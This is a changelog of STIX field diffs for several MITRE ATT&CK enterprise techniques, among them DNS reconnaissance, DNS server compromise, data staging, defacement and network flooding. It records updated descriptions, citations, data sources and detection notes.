x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-11-03 20:11:52.175000+00:002022-04-20 16:52:58.415000+00:00
descriptionAdversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services. (Citation: TechNet Services) On macOS, launchd processes known as [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) are run to finish system initialization and load user specific parameters.(Citation: AppleDocs Launch Agent Daemons) Adversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect. Services, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges. (Citation: OSX Malware Detection). Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services.(Citation: TechNet Services) On macOS, launchd processes known as [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) are run to finish system initialization and load user specific parameters.(Citation: AppleDocs Launch Agent Daemons) Adversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect. Services, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges.(Citation: OSX Malware Detection)
external_references[1]['source_name']TechNet ServicesAppleDocs Launch Agent Daemons
external_references[1]['description']Microsoft. (n.d.). Services. Retrieved June 7, 2016.Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved July 10, 2017.
external_references[1]['url']https://technet.microsoft.com/en-us/library/cc772408.aspxhttps://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html
external_references[2]['source_name']AppleDocs Launch Agent DaemonsTechNet Services
external_references[2]['description']Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved July 10, 2017.Microsoft. (n.d.). Services. Retrieved June 7, 2016.
external_references[2]['url']https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.htmlhttps://technet.microsoft.com/en-us/library/cc772408.aspx
x_mitre_data_sources[0]Service: Service CreationCommand: Command Execution
x_mitre_data_sources[2]Process: Process CreationProcess: OS API Execution
x_mitre_data_sources[3]Process: OS API ExecutionFile: File Creation
x_mitre_data_sources[4]Command: Command ExecutionService: Service Creation
x_mitre_data_sources[5]Windows Registry: Windows Registry Key CreationWindows Registry: Windows Registry Key Modification
x_mitre_data_sources[6]Windows Registry: Windows Registry Key ModificationFile: File Modification
x_mitre_data_sources[7]File: File CreationWindows Registry: Windows Registry Key Creation
x_mitre_data_sources[8]File: File ModificationProcess: Process Creation
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesDriver: Driver Load

[T1590.002] Gather Victim Network Information: DNS

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may gather information about the victim's DNS tht1Adversaries may gather information about the victim's DNS th
>at can be used during targeting. DNS information may include>at can be used during targeting. DNS information may include
> a variety of details, including registered name servers as > a variety of details, including registered name servers as 
>well as records that outline addressing for a target’s subdo>well as records that outline addressing for a target’s subdo
>mains, mail servers, and other hosts.  Adversaries may gathe>mains, mail servers, and other hosts. DNS, MX, TXT, and SPF 
>r this information in various ways, such as querying or othe>records may also reveal the use of third party cloud and Saa
>rwise collecting details via [DNS/Passive DNS](https://attac>S providers, such as Office 365, G Suite, Salesforce, or Zen
>k.mitre.org/techniques/T1596/001). DNS information may also >desk.(Citation: Sean Metcalf Twitter DNS Records)  Adversari
>be exposed to adversaries via online or other accessible dat>es may gather this information in various ways, such as quer
>a sets (ex: [Search Open Technical Databases](https://attack>ying or otherwise collecting details via [DNS/Passive DNS](h
>.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citat>ttps://attack.mitre.org/techniques/T1596/001). DNS informati
>ion: Circl Passive DNS) Gathering this information may revea>on may also be exposed to adversaries via online or other ac
>l opportunities for other forms of reconnaissance (ex: [Sear>cessible data sets (ex: [Search Open Technical Databases](ht
>ch Open Technical Databases](https://attack.mitre.org/techni>tps://attack.mitre.org/techniques/T1596)).(Citation: DNS Dum
>ques/T1596), [Search Open Websites/Domains](https://attack.m>pster)(Citation: Circl Passive DNS) Gathering this informati
>itre.org/techniques/T1593), or [Active Scanning](https://att>on may reveal opportunities for other forms of reconnaissanc
>ack.mitre.org/techniques/T1595)), establishing operational r>e (ex: [Search Open Technical Databases](https://attack.mitr
>esources (ex: [Acquire Infrastructure](https://attack.mitre.>e.org/techniques/T1596), [Search Open Websites/Domains](http
>org/techniques/T1583) or [Compromise Infrastructure](https:/>s://attack.mitre.org/techniques/T1593), or [Active Scanning]
>/attack.mitre.org/techniques/T1584)), and/or initial access >(https://attack.mitre.org/techniques/T1595)), establishing o
>(ex: [External Remote Services](https://attack.mitre.org/tec>perational resources (ex: [Acquire Infrastructure](https://a
>hniques/T1133)).>ttack.mitre.org/techniques/T1583) or [Compromise Infrastruct
 >ure](https://attack.mitre.org/techniques/T1584)), and/or ini
 >tial access (ex: [External Remote Services](https://attack.m
 >itre.org/techniques/T1133)).
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_contributors['Jannie Li, Microsoft Threat Intelligence\u202fCenter\u202f(MSTIC)']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-04-15 03:29:18.740000+00:002022-10-21 14:32:48.393000+00:00
descriptionAdversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS, MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records) Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).
external_references[1]['source_name']DNS DumpsterCircl Passive DNS
external_references[1]['description']Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.CIRCL Computer Incident Response Center. (n.d.). Passive DNS. Retrieved October 20, 2020.
external_references[1]['url']https://dnsdumpster.com/https://www.circl.lu/services/passive-dns/
external_references[2]['source_name']Circl Passive DNSDNS Dumpster
external_references[2]['description']CIRCL Computer Incident Response Center. (n.d.). Passive DNS. Retrieved October 20, 2020.Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
external_references[2]['url']https://www.circl.lu/services/passive-dns/https://dnsdumpster.com/
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Sean Metcalf Twitter DNS Records', 'description': 'Sean Metcalf. (2019, May 9). Sean Metcalf Twitter. Retrieved May 27, 2022.', 'url': 'https://twitter.com/PyroTek3/status/1126487227712921600/photo/1'}

[T1071.004] Application Layer Protocol: DNS

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-10-21 16:26:34.196000+00:002022-06-17 13:52:03.232000+00:00
external_references[1]['source_name']PAN DNS TunnelingMedium DnsTunneling
external_references[1]['description']Palo Alto Networks. (n.d.). What Is DNS Tunneling?. Retrieved March 15, 2020.Galobardes, R. (2018, October 30). Learn how easy is to bypass firewalls using DNS tunneling (and also how to block it). Retrieved March 15, 2020.
external_references[1]['url']https://www.paloaltonetworks.com/cyberpedia/what-is-dns-tunnelinghttps://medium.com/@galolbardes/learn-how-easy-is-to-bypass-firewalls-using-dns-tunneling-and-also-how-to-block-it-3ed652f4a000
external_references[2]['source_name']Medium DnsTunnelingUniversity of Birmingham C2
external_references[2]['description']Galobardes, R. (2018, October 30). Learn how easy is to bypass firewalls using DNS tunneling (and also how to block it). Retrieved March 15, 2020.Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
external_references[2]['url']https://medium.com/@galolbardes/learn-how-easy-is-to-bypass-firewalls-using-dns-tunneling-and-also-how-to-block-it-3ed652f4a000https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
external_references[3]['source_name']University of Birmingham C2PAN DNS Tunneling
external_references[3]['description']Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.Palo Alto Networks. (n.d.). What Is DNS Tunneling?. Retrieved March 15, 2020.
external_references[3]['url']https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdfhttps://www.paloaltonetworks.com/cyberpedia/what-is-dns-tunneling
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsChris Heald

[T1584.002] Compromise Infrastructure: DNS Server

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may compromise third-party DNS servers that can t1Adversaries may compromise third-party DNS servers that can 
>be used during targeting. During post-compromise activity, a>be used during targeting. During post-compromise activity, a
>dversaries may utilize DNS traffic for various tasks, includ>dversaries may utilize DNS traffic for various tasks, includ
>ing for Command and Control (ex: [Application Layer Protocol>ing for Command and Control (ex: [Application Layer Protocol
>](https://attack.mitre.org/techniques/T1071)). Instead of se>](https://attack.mitre.org/techniques/T1071)). Instead of se
>tting up their own DNS servers, adversaries may compromise t>tting up their own DNS servers, adversaries may compromise t
>hird-party DNS servers in support of operations.  By comprom>hird-party DNS servers in support of operations.  By comprom
>ising DNS servers, adversaries can alter DNS records. Such c>ising DNS servers, adversaries can alter DNS records. Such c
>ontrol can allow for redirection of an organization's traffi>ontrol can allow for redirection of an organization's traffi
>c, facilitating Collection and Credential Access efforts for>c, facilitating Collection and Credential Access efforts for
> the adversary.(Citation: Talos DNSpionage Nov 2018)(Citatio> the adversary.(Citation: Talos DNSpionage Nov 2018)(Citatio
>n: FireEye DNS Hijack 2019) Adversaries may also be able to >n: FireEye DNS Hijack 2019)  Additionally, adversaries may l
>silently create subdomains pointed at malicious servers with>everage such control in conjunction with [Digital Certificat
>out tipping off the actual owner of the DNS server.(Citation>es](https://attack.mitre.org/techniques/T1588/004) to redire
>: CiscoAngler)(Citation: Proofpoint Domain Shadowing)>ct traffic to adversary-controlled infrastructure, mimicking
 > normal trusted network communications.(Citation: FireEye DN
 >S Hijack 2019)(Citation: Crowdstrike DNS Hijack 2019) Advers
 >aries may also be able to silently create subdomains pointed
 > at malicious servers without tipping off the actual owner o
 >f the DNS server.(Citation: CiscoAngler)(Citation: Proofpoin
 >t Domain Shadowing)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_contributors['Jeremy Galloway']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-17 15:56:05.112000+00:002022-04-19 21:22:13.578000+00:00
descriptionAdversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations. By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing)Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations. By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019) Additionally, adversaries may leverage such control in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004) to redirect traffic to adversary-controlled infrastructure, mimicking normal trusted network communications.(Citation: FireEye DNS Hijack 2019)(Citation: Crowdstrike DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing)
external_references[1]['source_name']Talos DNSpionage Nov 2018FireEye DNS Hijack 2019
external_references[1]['description']Mercer, W., Rascagneres, P. (2018, November 27). DNSpionage Campaign Targets Middle East. Retrieved October 9, 2020.Hirani, M., Jones, S., Read, B. (2019, January 10). Global DNS Hijacking Campaign: DNS Record Manipulation at Scale. Retrieved October 9, 2020.
external_references[1]['url']https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.htmlhttps://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html
external_references[2]['source_name']FireEye DNS Hijack 2019Crowdstrike DNS Hijack 2019
external_references[2]['description']Hirani, M., Jones, S., Read, B. (2019, January 10). Global DNS Hijacking Campaign: DNS Record Manipulation at Scale. Retrieved October 9, 2020.Matt Dahl. (2019, January 25). Widespread DNS Hijacking Activity Targets Multiple Sectors. Retrieved February 14, 2022.
external_references[2]['url']https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.htmlhttps://www.crowdstrike.com/blog/widespread-dns-hijacking-activity-targets-multiple-sectors/
external_references[3]['source_name']CiscoAnglerTalos DNSpionage Nov 2018
external_references[3]['description']Nick Biasini. (2015, March 3). Threat Spotlight: Angler Lurking in the Domain Shadows. Retrieved March 6, 2017.Mercer, W., Rascagneres, P. (2018, November 27). DNSpionage Campaign Targets Middle East. Retrieved October 9, 2020.
external_references[3]['url']https://blogs.cisco.com/security/talos/angler-domain-shadowinghttps://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html
external_references[4]['source_name']Proofpoint Domain ShadowingCiscoAngler
external_references[4]['description']Proofpoint Staff. (2015, December 15). The shadow knows: Malvertising campaigns use domain shadowing to pull in Angler EK. Retrieved October 16, 2020.Nick Biasini. (2015, March 3). Threat Spotlight: Angler Lurking in the Domain Shadows. Retrieved March 6, 2017.
external_references[4]['url']https://www.proofpoint.com/us/threat-insight/post/The-Shadow-Knowshttps://blogs.cisco.com/security/talos/angler-domain-shadowing
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Proofpoint Domain Shadowing', 'description': 'Proofpoint Staff. (2015, December 15). The shadow knows: Malvertising campaigns use domain shadowing to pull in Angler EK. Retrieved October 16, 2020.', 'url': 'https://www.proofpoint.com/us/threat-insight/post/The-Shadow-Knows'}

[T1565] Data Manipulation

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may insert, delete, or manipulate data in order t1Adversaries may insert, delete, or manipulate data in order 
>to manipulate external outcomes or hide activity. By manipul>to influence external outcomes or hide activity, thus threat
>ating data, adversaries may attempt to affect a business pro>ening the integrity of the data. By manipulating data, adver
>cess, organizational understanding, or decision making.  The>saries may attempt to affect a business process, organizatio
> type of modification and the impact it will have depends on>nal understanding, or decision making.  The type of modifica
> the target application and process as well as the goals and>tion and the impact it will have depends on the target appli
> objectives of the adversary. For complex systems, an advers>cation and process as well as the goals and objectives of th
>ary would likely need special expertise and possibly access >e adversary. For complex systems, an adversary would likely 
>to specialized software related to the system that would typ>need special expertise and possibly access to specialized so
>ically be gained through a prolonged information gathering c>ftware related to the system that would typically be gained 
>ampaign in order to have the desired impact.>through a prolonged information gathering campaign in order 
 >to have the desired impact.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User', 'Administrator', 'root', 'SYSTEM']
values_changed
STIX FieldOld valueNew Value
modified2021-04-24 14:04:16.371000+00:002022-04-19 23:03:02.016000+00:00
descriptionAdversaries may insert, delete, or manipulate data in order to manipulate external outcomes or hide activity. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
x_mitre_data_sources[3]File: File CreationNetwork Traffic: Network Traffic Content
x_mitre_data_sources[6]Network Traffic: Network Traffic ContentFile: File Creation
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesNetwork Traffic: Network Traffic Flow
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesNetwork Traffic: Network Traffic Flow

[T1074] Data Staged

Current version: 1.4

Version changed from: 1.3 → 1.4

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-03-08 10:33:00.855000+00:002022-07-20 20:07:40.167000+00:00
external_references[1]['source_name']PWC Cloud Hopper April 2017Mandiant M-Trends 2020
external_references[1]['description']PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved April 5, 2017.Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020.
external_references[1]['url']https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdfhttps://content.fireeye.com/m-trends/rpt-m-trends-2020
external_references[2]['source_name']Mandiant M-Trends 2020PWC Cloud Hopper April 2017
external_references[2]['description']Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020.PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved April 5, 2017.
external_references[2]['url']https://content.fireeye.com/m-trends/rpt-m-trends-2020https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
x_mitre_detectionProcesses that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging. Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging. Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). Consider monitoring accesses and modifications to storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
x_mitre_version1.31.4
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesCommand: Command Execution
x_mitre_data_sourcesWindows Registry: Windows Registry Key Modification
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesCommand: Command Execution

[T1039] Data from Network Shared Drive

Current version: 1.3

Version changed from: 1.2 → 1.3

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_contributors['David Tayouri']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-24 15:42:44.026000+00:002022-06-16 13:08:03.209000+00:00
x_mitre_data_sources[1]Network Share: Network Share AccessNetwork Traffic: Network Traffic Content
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesNetwork Traffic: Network Connection Creation
x_mitre_data_sourcesNetwork Traffic: Network Traffic Content
x_mitre_data_sourcesNetwork Share: Network Share Access
x_mitre_data_sourcesNetwork Traffic: Network Connection Creation

[T1491] Defacement

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1Adversaries may modify visual content available internally ot1Adversaries may modify visual content available internally o
>r externally to an enterprise network. Reasons for [Defaceme>r externally to an enterprise network, thus affecting the in
>nt](https://attack.mitre.org/techniques/T1491) include deliv>tegrity of the original content. Reasons for [Defacement](ht
>ering messaging, intimidation, or claiming (possibly false) >tps://attack.mitre.org/techniques/T1491) include delivering 
>credit for an intrusion. Disturbing or offensive images may >messaging, intimidation, or claiming (possibly false) credit
>be used as a part of [Defacement](https://attack.mitre.org/t> for an intrusion. Disturbing or offensive images may be use
>echniques/T1491) in order to cause user discomfort, or to pr>d as a part of [Defacement](https://attack.mitre.org/techniq
>essure compliance with accompanying messages.  >ues/T1491) in order to cause user discomfort, or to pressure
 > compliance with accompanying messages.  
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-03-08 10:33:01.150000+00:002022-03-25 19:34:42.056000+00:00
descriptionAdversaries may modify visual content available internally or externally to an enterprise network. Reasons for [Defacement](https://attack.mitre.org/techniques/T1491) include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. Disturbing or offensive images may be used as a part of [Defacement](https://attack.mitre.org/techniques/T1491) in order to cause user discomfort, or to pressure compliance with accompanying messages. Adversaries may modify visual content available internally or externally to an enterprise network, thus affecting the integrity of the original content. Reasons for [Defacement](https://attack.mitre.org/techniques/T1491) include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. Disturbing or offensive images may be used as a part of [Defacement](https://attack.mitre.org/techniques/T1491) in order to cause user discomfort, or to pressure compliance with accompanying messages.
x_mitre_data_sources[0]File: File ModificationApplication Log: Application Log Content
x_mitre_data_sources[1]File: File CreationNetwork Traffic: Network Traffic Content
x_mitre_data_sources[2]Application Log: Application Log ContentFile: File Modification
x_mitre_data_sources[3]Network Traffic: Network Traffic ContentFile: File Creation
x_mitre_version1.21.3

[T1610] Deploy Container

Current version: 1.1

Version changed from: 1.0 → 1.1

New Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-04-14 12:02:20.641000+00:002022-04-01 13:14:58.939000+00:00
x_mitre_data_sources[3]Pod: Pod ModificationApplication Log: Application Log Content
x_mitre_data_sources[4]Application Log: Application Log ContentPod: Pod Modification
x_mitre_version1.01.1

[T1498.001] Network Denial of Service: Direct Network Flood

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1Adversaries may attempt to cause a denial of service (DoS) bt1Adversaries may attempt to cause a denial of service (DoS) b
>y directly sending a high-volume of network traffic to a tar>y directly sending a high-volume of network traffic to a tar
>get. [Direct Network Flood](https://attack.mitre.org/techniq>get. This DoS attack may also reduce the availability and fu
>ues/T1498/001) are when one or more systems are used to send>nctionality of the targeted system(s) and network. [Direct N
> a high-volume of network packets towards the targeted servi>etwork Flood](https://attack.mitre.org/techniques/T1498/001)
>ce's network. Almost any network protocol may be used for fl>s are when one or more systems are used to send a high-volum
>ooding. Stateless protocols such as UDP or ICMP are commonly>e of network packets towards the targeted service's network.
> used but stateful protocols such as TCP can be used as well> Almost any network protocol may be used for flooding. State
>.  Botnets are commonly used to conduct network flooding att>less protocols such as UDP or ICMP are commonly used but sta
>acks against networks and services. Large botnets can genera>teful protocols such as TCP can be used as well.  Botnets ar
>te a significant amount of traffic from systems spread acros>e commonly used to conduct network flooding attacks against 
>s the global Internet. Adversaries may have the resources to>networks and services. Large botnets can generate a signific
> build out and control their own botnet infrastructure or ma>ant amount of traffic from systems spread across the global 
>y rent time on an existing botnet to conduct an attack. In s>Internet. Adversaries may have the resources to build out an
>ome of the worst cases for distributed DoS (DDoS), so many s>d control their own botnet infrastructure or may rent time o
>ystems are used to generate the flood that each one only nee>n an existing botnet to conduct an attack. In some of the wo
>ds to send out a small amount of traffic to produce enough v>rst cases for distributed DoS (DDoS), so many systems are us
>olume to saturate the target network. In such circumstances,>ed to generate the flood that each one only needs to send ou
> distinguishing DDoS traffic from legitimate clients becomes>t a small amount of traffic to produce enough volume to satu
> exceedingly difficult. Botnets have been used in some of th>rate the target network. In such circumstances, distinguishi
>e most high-profile DDoS flooding attacks, such as the 2012 >ng DDoS traffic from legitimate clients becomes exceedingly 
>series of incidents that targeted major US banks.(Citation: >difficult. Botnets have been used in some of the most high-p
>USNYAG IranianBotnet March 2016)>rofile DDoS flooding attacks, such as the 2012 series of inc
 >idents that targeted major US banks.(Citation: USNYAG Irania
 >nBotnet March 2016)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesCisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow. Retrieved April 25, 2019.
external_referencesPreet Bharara, US Attorney. (2016, March 24). Retrieved April 23, 2019.
external_referencesCAPEC-125
external_referencesCAPEC-486
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-125
external_referencesCAPEC-486
external_referencesPreet Bharara, US Attorney. (2016, March 24). Retrieved April 23, 2019.
external_referencesCisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow. Retrieved April 25, 2019.
values_changed
STIX FieldOld valueNew Value
modified2021-03-29 16:11:56.727000+00:002022-04-19 23:28:52.908000+00:00
